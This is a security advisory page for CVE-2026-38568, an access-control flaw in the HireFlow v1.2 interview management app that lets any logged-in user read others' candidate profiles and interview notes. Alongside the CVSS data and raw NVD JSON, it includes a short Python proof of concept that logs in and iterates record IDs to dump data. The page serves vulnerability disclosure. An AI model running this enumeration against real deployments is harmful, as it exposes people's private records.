Security Vulnerability Report
中文
CVE-2026-38568 CVSS 8.1 HIGH

CVE-2026-38568

Published: 2026-05-11 18:16:33
Last Modified: 2026-05-11 19:16:22
Source: [email protected]

Description

HireFlow v1.2 is vulnerable to Incorrect Access Control. The application does not enforce object-level authorization on the /candidate/<id> and /interview/<id> endpoints. The route handlers retrieve records by the user-supplied ID without verifying that the requesting user is the owner or has an authorized role. Any authenticated user can access any other user's candidate profiles and interview notes by iterating the integer ID in the URL path, constituting a horizontal privilege escalation and full data breach of all records in the system.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

HireFlow 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "http://localhost:8000" login_endpoint = "/api/login" candidate_endpoint = "/candidate/{}" username = "[email protected]" password = "password123" # 1. Authenticate to get session session = requests.Session() login_payload = {"username": username, "password": password} response = session.post(target_url + login_endpoint, json=login_payload) if response.status_code == 200: print("[+] Login successful") # 2. Iterate through IDs to exploit IDOR for candidate_id in range(1, 100): vuln_url = target_url + candidate_endpoint.format(candidate_id) resp = session.get(vuln_url) if resp.status_code == 200 and "name" in resp.json(): print(f"[+] Found data for ID {candidate_id}: {resp.json()}") elif resp.status_code == 404: continue else: print(f"[-] ID {candidate_id} access denied or error") else: print("[-] Login failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38568", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:32.970", "lastModified": "2026-05-11T19:16:21.903", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "HireFlow v1.2 is vulnerable to Incorrect Access Control. The application does not enforce object-level authorization on the /candidate/<id> and /interview/<id> endpoints. The route handlers retrieve records by the user-supplied ID without verifying that the requesting user is the owner or has an authorized role. Any authenticated user can access any other user's candidate profiles and interview notes by iterating the integer ID in the URL path, constituting a horizontal privilege escalation and full data breach of all records in the system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/StratonWebDesigners/HireFlow", "source": "[email protected]"}, {"url": "https://github.com/hijackedamygdala/CVE-Disclosures/tree/main/HireFlow/CVE-2026-38568", "source": "[email protected]"}, {"url": "https://www.sourcecodester.com/python/18688/hireflow-%E2%80%93-complete-interview-management-system.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.